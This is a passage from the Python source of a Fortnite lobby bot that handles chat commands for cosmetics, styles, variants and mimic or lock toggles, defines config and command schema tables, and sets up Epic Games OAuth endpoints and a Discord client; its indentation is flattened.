text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['set']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}({item['set']})")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{
"item": item
} for item in result
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setstyle']:
try:
if not any(args[1] in commands[key] for key in ("outfit", "backpack", "pickaxe")):
await reply(message, client, f"[{commands['setstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}]]")
return
type_ = convert_to_asset(args[1])
id_ = member_asset(client.party.me, type_)
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
result = await loop.run_in_executor(None, search_style, data["search-lang"], id_, type_)
if result is None:
await reply(message, client, l('no_stylechange'))
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {item['name']}"
text += f"\n{l('enter_to_set_style')}"
await reply(message, client, text)
client.select[message.author.id] = {"exec": [f"await client.change_asset('{message.author.id}', '{type_}', '{id_}', {variants['variants']})" for variants in result]}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addstyle']:
try:
if not any(args[1] in commands[key] for key in ("outfit", "backpack", "pickaxe")):
await reply(message, client, f"[{commands['addstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}]]")
return
type_ = convert_to_asset(args[1])
id_ = member_asset(client.party.me, type_)
variants_ = getattr(client.party.me, f"{type_}_variants")
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
result = await loop.run_in_executor(None, search_style, data["search-lang"], id_, type_)
if result is None:
await reply(message, client, l('no_stylechange'))
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {item['name']}"
text += f"\n{l('enter_to_set_style')}"
await reply(message, client, text)
client.select[message.author.id] = {"exec": [f"await client.change_asset('{message.author.id}', '{type_}', '{id_}', {variants_} + {variants['variants']})" for variants in result]}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['addstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setvariant']:
try:
if not any(args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe")):
await reply(message, client, f"[{commands['setvariant']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
return
variantdict={}
for count,text in enumerate(args[2:]):
if count % 2 != 0:
continue
try:
variantdict[text]=args[count+3]
except IndexError:
break
type_ = convert_to_type(args[1])
id_ = member_asset(client.party.me, convert_to_asset(args[1]))
variants = client.party.me.create_variants(item='AthenaCharacter', **variantdict)
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
if await client.change_asset(message.author.id, type_, id_, variants, client.party.me.enlightenments) is False:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setvariant']}] [ID] [variant] [{l('number')}]")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addvariant']:
try:
if not any(args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe")):
await reply(message, client, f"[{commands['addvariant']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
return
variantdict={}
for count,text in enumerate(args[2:]):
if count % 2 != 0:
continue
try:
variantdict[text]=args[count+3]
except IndexError:
break
type_ = convert_to_type(args[1])
id_ = member_asset(client.party.me, convert_to_asset(args[1]))
variants = client.party.me.create_variants(item='AthenaCharacter', **variantdict)
variants += getattr(client.party.me, f"{convert_to_asset(args[1])}_variants")
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
if await client.change_asset(message.author.id, type_, id_, variants, client.party.me.enlightenments) is False:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['addvariant']}] [ID] [variant] [{l('number')}]")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif any(args[0].lower().startswith(id_) for id_ in ("cid_", "bid_", "petcarrier_", "pickaxe_id_", "eid_", "emoji_", "toy_")):
try:
type_ = convert_to_type(args[0])
if not await client.change_asset(message.author.id, type_, args[0]):
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0].lower().startswith('playlist_'):
try:
await client.party.set_playlist(args[0])
await reply(message, client, l('set_playlist', args[0]))
data['fortnite']['playlist']=args[0]
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
else:
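# The remaining toggles are table-driven: mimic settings accept
# true/false or a player to copy, while the lock/feature flags
# further below accept only true/false.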
keys = {
"outfitmimic": ["outfitmimic", l('mimic', l("outfit"))],
"backpackmimic": ["backpackmimic", l('mimic', l("backpack"))],
"pickaxemimic": ["pickaxemimic", l('mimic', l("pickaxe"))],
"emotemimic": ["emotemimic", l('mimic', l("emote"))]
}
for key,value in keys.items():
if args[0] in commands[key]:
try:
if args[1] in commands['true']:
setattr(client,value[0],True)
send(display_name,l('set_to', value[1], l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('on')))
elif args[1] in commands['false']:
setattr(client,value[0],False)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('off')))
else:
if data['caseinsensitive']:
users = {str(user.display_name): user for user in client.party.members if content_ in jaconv.kata2hira(str(user.display_name).lower())}
else:
users = {str(user.display_name): user for user in client.party.members if content_ in str(user.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
setattr(client,value[0],user.id)
send(display_name,l('set_to', value[1], name(user)),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], name(user)))
else:
client.select[message.author.id] = {
"exec": [
"""\
setattr(client,value[0],user.id)
send(display_name,l('set_to', value[1], name(user)),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], name(user)))""" for user in users.values()
],
"variable": [
{"user": user, "value": value} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_mimic_user')}"
await reply(message, client, text)
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}] / {l('name_or_id')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
keys = {
"outfitlock": ["outfitlock", l('lock', l("outfit"))],
"backpacklock": ["backpacklock", l('lock', l("backpack"))],
"pickaxelock": ["pickaxelock", l('lock', l("pickaxe"))],
"emotelock": ["emotelock", l('lock', l("emote"))],
"whisper": ["whisper", l('command_from', l('whisper'))],
"partychat": ["partychat", l('command_from', l('partychat'))],
"discord": ["discord", l('command_from', l('discord'))],
"web": ["web", l('command_from', l('web'))],
"disablewhisperperfectly": ["whisperperfect", l('disable_perfect', l('whisper'))],
"disablepartychatperfectly": ["partychatperfect", l('disable_perfect', l('partychat'))],
"disablediscordperfectly": ["discordperfect", l('disable_perfect', l('discord'))],
"acceptinvite": ["acceptinvite", l('invite')],
"acceptfriend": ["acceptfriend", l('friend_request')],
"joinmessageenable": ["joinmessageenable", l('join_', l('message'))],
"randommessageenable": ["randommessageenable", l('join_', l('randommessage'))]
}
for key,value in keys.items():
if args[0] in commands[key]:
try:
if args[1] in commands['true']:
setattr(client,value[0],True)
send(display_name,l('set_to', value[1], l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('on')))
elif args[1] in commands['false']:
setattr(client,value[0],False)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('off')))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
if ': ' in message.content:
return
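# A numeric reply resolves a pending selection: fetch the stored
# exec snippet and its per-choice variables, then run it against
# the current globals/locals via aexec().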
if content.isdigit() and client.select.get(message.author.id):
try:
if int(args[0]) == 0:
await reply(message, client, l('please_enter_valid_number'))
return
exec_ = client.select[message.author.id]["exec"][int(args[0])-1]
variable = {**globals(), **locals()}
if client.select[message.author.id].get("variable"):
variable.update(client.select[message.author.id]["variable"][int(args[0])-1])
await aexec(exec_, variable)
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('please_enter_valid_number'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
else:
if do_itemsearch:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", content, "Item")
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", content, "Item")
if result:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]["backendType"]), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
bot_ready = True
first_boot = True
filename = 'device_auths.json'
web_text = ''
cache_users = {}
cache_items = {}
cache_banners = {}
client_name = {}
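# Backend item types the bot never equips (presumably because they
# have no lobby preview).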
ignoretype = [
"Contrail",
"Glider",
"Wrap",
"Loading Screen",
"Music",
"Spray",
"Battle Bus"
]
clients = []
loadedclients = []
whitelist = []
whitelist_ = []
blacklist = []
blacklist_ = []
otherbotlist = []
storedlogs = []
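# Matches {placeholder} tokens in reply/message templates.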
format_pattern = re.compile(r"""\{(.*?)\}""")
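# Schema for config.json: each key path maps to [expected type,
# optional editor hint] used for validation and, presumably, the
# web-based config editor.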
config_tags={
"['fortnite']": [dict],
"['fortnite']['email']": [str,"can_be_multiple"],
"['fortnite']['owner']": [str,"can_be_multiple"],
"['fortnite']['platform']": [str,"select_platform"],
"['fortnite']['outfit']": [str],
"['fortnite']['outfit_style']": [str],
"['fortnite']['backpack']": [str],
"['fortnite']['backpack_style']": [str],
"['fortnite']['pickaxe']": [str],
"['fortnite']['pickaxe_style']": [str],
"['fortnite']['emote']": [str],
"['fortnite']['playlist']": [str],
"['fortnite']['banner']": [str],
"['fortnite']['banner_color']": [str],
"['fortnite']['avatar_id']": [str],
"['fortnite']['avatar_color']": [str,"can_linebreak"],
"['fortnite']['level']": [int],
"['fortnite']['tier']": [int],
"['fortnite']['xpboost']": [int],
"['fortnite']['friendxpboost']": [int],
"['fortnite']['status']": [str],
"['fortnite']['privacy']": [str,"select_privacy"],
"['fortnite']['whisper']": [bool_,"select_bool"],
"['fortnite']['partychat']": [bool_,"select_bool"],
"['fortnite']['disablewhisperperfectly']": [bool_,"select_bool"],
"['fortnite']['disablepartychatperfectly']": [bool_,"select_bool"],
"['fortnite']['ignorebot']": [bool_,"select_bool"],
"['fortnite']['joinmessage']": [str,"can_linebreak"],
"['fortnite']['randommessage']": [str,"can_be_multiple"],
"['fortnite']['joinmessageenable']": [bool_,"select_bool"],
"['fortnite']['randommessageenable']": [bool_,"select_bool"],
"['fortnite']['joinemote']": [bool_,"select_bool"],
"['fortnite']['click_invite']": [bool_,"select_bool"],
"['fortnite']['disable_voice']": [bool_,"select_bool"],
"['fortnite']['outfitmimic']": [bool_,"select_bool"],
"['fortnite']['backpackmimic']": [bool_,"select_bool"],
"['fortnite']['pickaxemimic']": [bool_,"select_bool"],
"['fortnite']['emotemimic']": [bool_,"select_bool"],
"['fortnite']['mimic-ignorebot']": [bool_,"select_bool"],
"['fortnite']['mimic-ignoreblacklist']": [bool_,"select_bool"],
"['fortnite']['outfitlock']": [bool_,"select_bool"],
"['fortnite']['backpacklock']": [bool_,"select_bool"],
"['fortnite']['pickaxelock']": [bool_,"select_bool"],
"['fortnite']['emotelock']": [bool_,"select_bool"],
"['fortnite']['acceptinvite']": [bool_,"select_bool"],
"['fortnite']['acceptfriend']": [bool_none,"select_bool_none"],
"['fortnite']['addfriend']": [bool_,"select_bool"],
"['fortnite']['invite-ownerdecline']": [bool_,"select_bool"],
"['fortnite']['inviteinterval']": [bool_,"select_bool"],
"['fortnite']['interval']": [int],
"['fortnite']['waitinterval']": [int],
"['fortnite']['hide-user']": [bool_,"select_bool"],
"['fortnite']['hide-blacklist']": [bool_,"select_bool"],
"['fortnite']['show-owner']": [bool_,"select_bool"],
"['fortnite']['show-whitelist']": [bool_,"select_bool"],
"['fortnite']['show-bot']": [bool_,"select_bool"],
"['fortnite']['blacklist']": [str,"can_be_multiple"],
"['fortnite']['blacklist-declineinvite']": [bool_,"select_bool"],
"['fortnite']['blacklist-autoblock']": [bool_,"select_bool"],
"['fortnite']['blacklist-autokick']": [bool_,"select_bool"],
"['fortnite']['blacklist-autochatban']": [bool_,"select_bool"],
"['fortnite']['blacklist-ignorecommand']": [bool_,"select_bool"],
"['fortnite']['whitelist']": [str,"can_be_multiple"],
"['fortnite']['whitelist-allowinvite']": [bool_,"select_bool"],
"['fortnite']['whitelist-declineinvite']": [bool_,"select_bool"],
"['fortnite']['whitelist-ignorelock']": [bool_,"select_bool"],
"['fortnite']['whitelist-ownercommand']": [bool_,"select_bool"],
"['fortnite']['whitelist-ignoreng']": [bool_,"select_bool"],
"['fortnite']['invitelist']": [str,"can_be_multiple"],
"['fortnite']['otherbotlist']": [str,"can_be_multiple"],
"['discord']": [dict],
"['discord']['enabled']": [bool_,"select_bool"],
"['discord']['token']": [str],
"['discord']['owner']": [int,"can_be_multiple"],
"['discord']['channels']": [str,"can_be_multiple"],
"['discord']['status']": [str],
"['discord']['status_type']": [str,"select_status"],
"['discord']['discord']": [bool_,"select_bool"],
"['discord']['disablediscordperfectly']": [bool_,"select_bool"],
"['discord']['ignorebot']": [bool_,"select_bool"],
"['discord']['blacklist']": [str,"can_be_multiple"],
"['discord']['blacklist-ignorecommand']": [bool_,"select_bool"],
"['discord']['whitelist']": [str,"can_be_multiple"],
"['discord']['whitelist-ignorelock']": [bool_,"select_bool"],
"['discord']['whitelist-ownercommand']": [bool_,"select_bool"],
"['discord']['whitelist-ignoreng']": [bool_,"select_bool"],
"['web']": [dict],
"['web']['enabled']": [bool_,"select_bool"],
"['web']['ip']": [str],
"['web']['port']": [int],
"['web']['password']": [str],
"['web']['login_required']": [bool_,"select_bool"],
"['web']['web']": [bool_,"select_bool"],
"['web']['log']": [bool_,"select_bool"],
"['replies-matchmethod']": [str,"select_matchmethod"],
"['ng-words']": [str,"can_be_multiple"],
"['ng-word-matchmethod']": [str,"select_matchmethod"],
"['ng-word-kick']": [bool_,"select_bool"],
"['ng-word-chatban']": [bool_,"select_bool"],
"['ng-word-blacklist']": [bool_,"select_bool"],
"['restart_in']": [int],
"['search_max']": [int],
"['lang']": [str,"select_lang"],
"['search-lang']": [str,"select_ben_lang"],
"['sub-search-lang']": [str,"select_ben_lang"],
"['no-logs']": [bool_,"select_bool"],
"['ingame-error']": [bool_,"select_bool"],
"['discord-log']": [bool_,"select_bool"],
"['omit-over2000']": [bool_,"select_bool"],
"['skip-if-overflow']": [bool_,"select_bool"],
"['hide-email']": [bool_,"select_bool"],
"['hide-token']": [bool_,"select_bool"],
"['hide-webhook']": [bool_,"select_bool"],
"['webhook']": [str],
"['caseinsensitive']": [bool_,"select_bool"],
"['loglevel']": [str,"select_loglevel"],
"['debug']": [bool_,"select_bool"]
}
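# Keep an untouched copy of the tag table; the converter loop further down
# replaces the marker strings in config_tags with classes in place.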
config_tags_raw = copy.deepcopy(config_tags)
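# commands_tags follows the same scheme for commands.json: every command
# name maps to a list of trigger aliases, hence [str, "can_be_multiple"]
# on each entry.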
commands_tags={
"['usercommands']": [str,"can_be_multiple"],
"['true']": [str,"can_be_multiple"],
"['false']": [str,"can_be_multiple"],
"['me']": [str,"can_be_multiple"],
"['prev']": [str,"can_be_multiple"],
"['eval']": [str,"can_be_multiple"],
"['exec']": [str,"can_be_multiple"],
"['restart']": [str,"can_be_multiple"],
"['relogin']": [str,"can_be_multiple"],
"['reload']": [str,"can_be_multiple"],
"['addblacklist']": [str,"can_be_multiple"],
"['removeblacklist']": [str,"can_be_multiple"],
"['addwhitelist']": [str,"can_be_multiple"],
"['removewhitelist']": [str,"can_be_multiple"],
"['addblacklist_discord']": [str,"can_be_multiple"],
"['removeblacklist_discord']": [str,"can_be_multiple"],
"['addwhitelist_discord']": [str,"can_be_multiple"],
"['removewhitelist_discord']": [str,"can_be_multiple"],
"['addinvitelist']": [str,"can_be_multiple"],
"['removeinvitelist']": [str,"can_be_multiple"],
"['get']": [str,"can_be_multiple"],
"['friendcount']": [str,"can_be_multiple"],
"['pendingcount']": [str,"can_be_multiple"],
"['blockcount']": [str,"can_be_multiple"],
"['friendlist']": [str,"can_be_multiple"],
"['pendinglist']": [str,"can_be_multiple"],
"['blocklist']": [str,"can_be_multiple"],
"['outfitmimic']": [str,"can_be_multiple"],
"['backpackmimic']": [str,"can_be_multiple"],
"['pickaxemimic']": [str,"can_be_multiple"],
"['emotemimic']": [str,"can_be_multiple"],
"['whisper']": [str,"can_be_multiple"],
"['partychat']": [str,"can_be_multiple"],
"['discord']": [str,"can_be_multiple"],
"['web']": [str,"can_be_multiple"],
"['disablewhisperperfectly']": [str,"can_be_multiple"],
"['disablepartychatperfectly']": [str,"can_be_multiple"],
"['disablediscordperfectly']": [str,"can_be_multiple"],
"['acceptinvite']": [str,"can_be_multiple"],
"['acceptfriend']": [str,"can_be_multiple"],
"['joinmessageenable']": [str,"can_be_multiple"],
"['randommessageenable']": [str,"can_be_multiple"],
"['wait']": [str,"can_be_multiple"],
"['join']": [str,"can_be_multiple"],
"['joinid']": [str,"can_be_multiple"],
"['leave']": [str,"can_be_multiple"],
"['invite']": [str,"can_be_multiple"],
"['inviteall']": [str,"can_be_multiple"],
"['message']": [str,"can_be_multiple"],
"['partymessage']": [str,"can_be_multiple"],
"['sendall']": [str,"can_be_multiple"],
"['status']": [str,"can_be_multiple"],
"['avatar']": [str,"can_be_multiple"],
"['banner']": [str,"can_be_multiple"],
"['level']": [str,"can_be_multiple"],
"['bp']": [str,"can_be_multiple"],
"['privacy']": [str,"can_be_multiple"],
"['privacy_public']": [str,"can_be_multiple"],
"['privacy_friends_allow_friends_of_friends']": [str,"can_be_multiple"],
"['privacy_friends']": [str,"can_be_multiple"],
"['privacy_private_allow_friends_of_friends']": [str,"can_be_multiple"],
"['privacy_private']": [str,"can_be_multiple"],
"['getuser']": [str,"can_be_multiple"],
"['getfriend']": [str,"can_be_multiple"],
"['getpending']": [str,"can_be_multiple"],
"['getblock']": [str,"can_be_multiple"],
"['info']": [str,"can_be_multiple"],
"['info_party']": [str,"can_be_multiple"],
"['pending']": [str,"can_be_multiple"],
"['removepending']": [str,"can_be_multiple"],
"['addfriend']": [str,"can_be_multiple"],
"['removefriend']": [str,"can_be_multiple"],
"['removeallfriend']": [str,"can_be_multiple"],
"['remove_offline_for']": [str,"can_be_multiple"],
"['acceptpending']": [str,"can_be_multiple"],
"['declinepending']": [str,"can_be_multiple"],
"['blockfriend']": [str,"can_be_multiple"],
"['unblockfriend']": [str,"can_be_multiple"],
"['voice']": [str,"can_be_multiple"],
"['chatban']": [str,"can_be_multiple"],
"['promote']": [str,"can_be_multiple"],
"['kick']": [str,"can_be_multiple"],
"['hide']": [str,"can_be_multiple"],
"['show']": [str,"can_be_multiple"],
"['ready']": [str,"can_be_multiple"],
"['unready']": [str,"can_be_multiple"],
"['sitout']": [str,"can_be_multiple"],
"['match']": [str,"can_be_multiple"],
"['unmatch']": [str,"can_be_multiple"],
"['swap']": [str,"can_be_multiple"],
"['outfitlock']": [str,"can_be_multiple"],
"['backpacklock']": [str,"can_be_multiple"],
"['pickaxelock']": [str,"can_be_multiple"],
"['emotelock']": [str,"can_be_multiple"],
"['stop']": [str,"can_be_multiple"],
"['addeditems']": [str,"can_be_multiple"],
"['shopitems']": [str,"can_be_multiple"],
"['alloutfit']": [str,"can_be_multiple"],
"['allbackpack']": [str,"can_be_multiple"],
"['allpet']": [str,"can_be_multiple"],
"['allpickaxe']": [str,"can_be_multiple"],
"['allemote']": [str,"can_be_multiple"],
"['allemoji']": [str,"can_be_multiple"],
"['alltoy']": [str,"can_be_multiple"],
"['cid']": [str,"can_be_multiple"],
"['bid']": [str,"can_be_multiple"],
"['petcarrier']": [str,"can_be_multiple"],
"['pickaxe_id']": [str,"can_be_multiple"],
"['eid']": [str,"can_be_multiple"],
"['emoji_id']": [str,"can_be_multiple"],
"['toy_id']": [str,"can_be_multiple"],
"['id']": [str,"can_be_multiple"],
"['outfit']": [str,"can_be_multiple"],
"['backpack']": [str,"can_be_multiple"],
"['pet']": [str,"can_be_multiple"],
"['pickaxe']": [str,"can_be_multiple"],
"['emote']": [str,"can_be_multiple"],
"['emoji']": [str,"can_be_multiple"],
"['toy']": [str,"can_be_multiple"],
"['item']": [str,"can_be_multiple"],
"['set']": [str,"can_be_multiple"],
"['setvariant']": [str,"can_be_multiple"],
"['addvariant']": [str,"can_be_multiple"],
"['setstyle']": [str,"can_be_multiple"],
"['addstyle']": [str,"can_be_multiple"],
"['setenlightenment']": [str,"can_be_multiple"]
}
error_config = []
error_commands = []
outfit_keys = ("cid", "outfit", "outfitmimic", "outfitlock", "alloutfit")
backpack_keys = ("bid", "backpack", "backpackmimic", "backpacklock", "allbackpack")
pet_keys = ("petcarrier", "pet", "allpet")
pickaxe_keys = ("pickaxe_id", "pickaxe", "pickaxemimic", "pickaxelock", "allpickaxe")
emote_keys = ("eid", "emote", "emotemimic", "emotelock", "allemote")
emoji_keys = ("emoji_id", "emoji", "allemoji")
toy_keys = ("toy_id", "toy", "alltoy")
item_keys = ("id", "item")
app = Sanic(__name__)
app.secret_key = os.urandom(32)
app.static('/images', './templates/images')
env = Environment(loader=FileSystemLoader('./templates', encoding='utf8'), extensions=['jinja2.ext.do'])
auth = LoginManager()
fortnitepy_auth = fortnitepy.Auth()
launcher_token = fortnitepy_auth.ios_token
fortnite_token = fortnitepy_auth.fortnite_token
oauth_url = "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token"
fortnite_token_url = "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token"
exchange_auth_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/token"
device_auth_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/deviceAuthorization"
exchange_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/exchange"
user_lookup_url = "https://account-public-service-prod.ol.epicgames.com/account/api/public/account/{user_id}"
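# Epic Games account-service endpoints used for the OAuth / device-auth flow.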
if not load_config():
sys.exit(1)
if error_config or error_commands:
bot_ready = False
for key in error_config:
config_tags[key].append("fix_required")
for key in error_commands:
commands_tags[key].append("fix_required")
search_max = data["search_max"]
if data['debug']:
logger = logging.getLogger('fortnitepy.auth')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[36m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
logger = logging.getLogger('fortnitepy.http')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[36m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
logger = logging.getLogger('fortnitepy.xmpp')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[35m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
if os.getcwd().startswith('/app') or os.getcwd().startswith('/home/runner'):
data['web']['ip'] = "0.0.0.0"
else:
data['web']['ip'] = data['web']['ip'].format(ip=socket.gethostbyname(socket.gethostname()))
if True:
send(l('bot'),f'{l("lobbybot")}: gomashio\n{l("credit")}\n{l("library")}: Terbau',cyan)
text = ""
if data['loglevel'] == 'normal':
text += f'\n{l("loglevel")}: {l("normal")}\n'
elif data['loglevel'] == 'info':
text += f'\n{l("loglevel")}: {l("info")}\n'
elif data['loglevel'] == 'debug':
text += f'\n{l("loglevel")}: {l("debug")}\n'
if data.get('debug',False) is True:
text += f'\n{l("debug")}: {l("on")}\n'
else:
text += f'\n{l("debug")}: {l("off")}\n'
text += f'\nPython {platform.python_version()}\n'
text += f'fortnitepy {fortnitepy.__version__}\n'
text += f'discord.py {discord.__version__}\n'
text += f'Sanic {sanic.__version__}\n'
send(l('bot'),text,green)
if data.get('debug',False) is True:
send(l('bot'),f'[{now()}] {l("debug_is_on")}',red)
send(l('bot'),l("booting"))
dclient = discord.Client()
dclient.owner = []
dclient.isready = False
dclient.boot_time = None
if True: #discord
@dclient.event
async def on_ready() -> None:
loop = asyncio.get_event_loop()
dclient.boot_time = time.time()
dclient_user = name(dclient.user)
send(dclient_user,f"{l('login')}: {dclient_user}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
dclient.isready = True
loop.create_task(status_loop())
dclient.owner = []
for owner in data['discord']['owner']:
user = dclient.get_user(owner)
if not user:
try:
user = await dclient.fetch_user(owner)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l('error_while_requesting_userinfo'),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
